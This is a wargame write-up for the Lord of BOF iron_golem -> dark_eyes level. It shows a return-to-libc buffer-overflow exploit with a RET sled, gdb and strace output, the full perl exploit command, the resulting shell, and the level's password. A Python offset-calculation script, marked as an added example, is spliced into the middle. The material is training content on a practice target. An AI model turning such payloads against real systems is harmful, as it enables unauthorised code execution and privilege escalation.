Wargame/LOB_FC

[LOB_FC3] iron_golem -> dark_eyes

bbolmin 2014. 7. 12. 11:28



#Env 


- NX

- ascii armor

- random stack


#Technique


- Build the RTL arguments with an &ret sled




dark_eyes.c source



A step that restores the SFP has been added, and RET sledding is given as the hint. RET sledding does not depend on the SFP, so the problem can be solved the same way as the "gate->iron_golem" problem.








[Writing the payload]


[iron_golem@Fedora_1stFloor ~]$ strace -i ./dark_eyes `perl -e 'print "A"x270'`

[007037c0] execve("./dark_eyes", ["./dark_eyes", "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
.... omitted ...

[00004141] --- SIGSEGV (Segmentation fault) @ 0 (0) ---

upeek: ptrace(PTRACE_PEEKUSER,3094,48,0): No such process

[????????] +++ killed by SIGSEGV +++

[iron_golem@Fedora_1stFloor ~]$


=> Confirms the layout is 268 bytes + 4 bytes (ret)
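As an added example (not part of the original writeup), the strace crash above can be read programmatically during crash triage: the script pulls the faulting EIP that `strace -i` prints in front of the SIGSEGV line, counts how many bytes of the fill character reached the saved return address, and derives the 268-byte offset from the 270 bytes that were sent. The sample text is a constructed copy of the three strace lines above, and the function names are my own.

```python
import re

# Constructed sample: the tail of the strace session from the writeup
# (270 x "A" sent, crash with EIP = 0x00004141). Not a live capture here.
STRACE_TAIL = """\
[00004141] --- SIGSEGV (Segmentation fault) @ 0 (0) ---
upeek: ptrace(PTRACE_PEEKUSER,3094,48,0): No such process
[????????] +++ killed by SIGSEGV +++
"""

# strace -i prefixes every event with the instruction pointer in brackets.
SIGSEGV_RE = re.compile(r"^\[([0-9a-fA-F]{8})\] --- SIGSEGV")


def fault_eip(strace_output):
    """Return the EIP recorded on the SIGSEGV line, or None if there is no crash."""
    for line in strace_output.splitlines():
        m = SIGSEGV_RE.match(line)
        if m:
            return int(m.group(1), 16)
    return None


def fill_bytes_in_eip(eip, fill=0x41):
    """Count how many low (little-endian) bytes of EIP equal the fill byte.

    A NUL-terminated fill string that ends inside the saved return address
    leaves its first k bytes as the fill value and the next byte as 0x00,
    so k tells how far past the return-address slot the input reached.
    """
    k = 0
    for b in eip.to_bytes(4, "little"):
        if b != fill:
            break
        k += 1
    return k


def ret_offset(sent_len, eip, fill=0x41):
    """Offset of the saved return address from the start of the overflowed buffer."""
    k = fill_bytes_in_eip(eip, fill)
    if k == 0:
        raise ValueError("EIP holds no fill bytes; the input did not reach the return address")
    return sent_len - k


if __name__ == "__main__":
    eip = fault_eip(STRACE_TAIL)
    print("fault EIP: 0x%08x" % eip)
    print("return address offset:", ret_offset(270, eip))  # 268
```

The same reasoning is what the writeup does by hand: two 0x41 bytes in EIP out of 270 sent means the return address starts 268 bytes into the buffer, which is why the payload below begins with 268 bytes of filler.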



(gdb) x/i 0x080484b9

0x80484b9 <main+177>:   ret


(gdb) p execl

$2 = {<text variable, no debug info>} 0x7a5720 <execl>


(gdb) x/40x $esp+0x120

0xfef33920:     0x61616161      0x61616161      0x61616161      0x61616161

0xfef33930:     0x61616161      0x61616161      0x61616161      0x61616161

0xfef33940:     0x00000000      0xfef339c4      0xfef339d0      0x0070eab6

0xfef33950:     0x0083eff4      0x00000000      0xfef33950      0xfef33998

0xfef33960:     0xfef33940      0x00730df5      0x00000000      0x00000000

0xfef33970:     0x00000000      0x00718fb4      0x00000002      0x08048360


=> 
&ret = 0x80484b9 
&execl = 0x7a5720
execl(0x0070eab6, 0x0083eff4, 0x00000000)

payload : |   268 dummy  |  &ret x 2 | &execl | dummy(4) | 0x0070eab6, 0x0083eff4, 0x00000000 ......



Exploit command : ./dark_eyes  "`perl -e 'print "a"x268, "\xb9\x84\x04\x08"x2, "\x20\x57\x7a"'`"


[iron_golem@Fedora_1stFloor ~]$ ./dark_eyes  "`perl -e 'print "a"x268, "\xb9\x84\x04\x08"x2, "\x20\x57\x7a"'`"

aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa삻蕓뭐 Wz

sh-3.00$ id

uid=502(dark_eyes) gid=502(dark_eyes) groups=501(iron_golem) context=user_u:system_r:unconfined_t

sh-3.00$ my-pass

euid = 502

because of you

sh-3.00$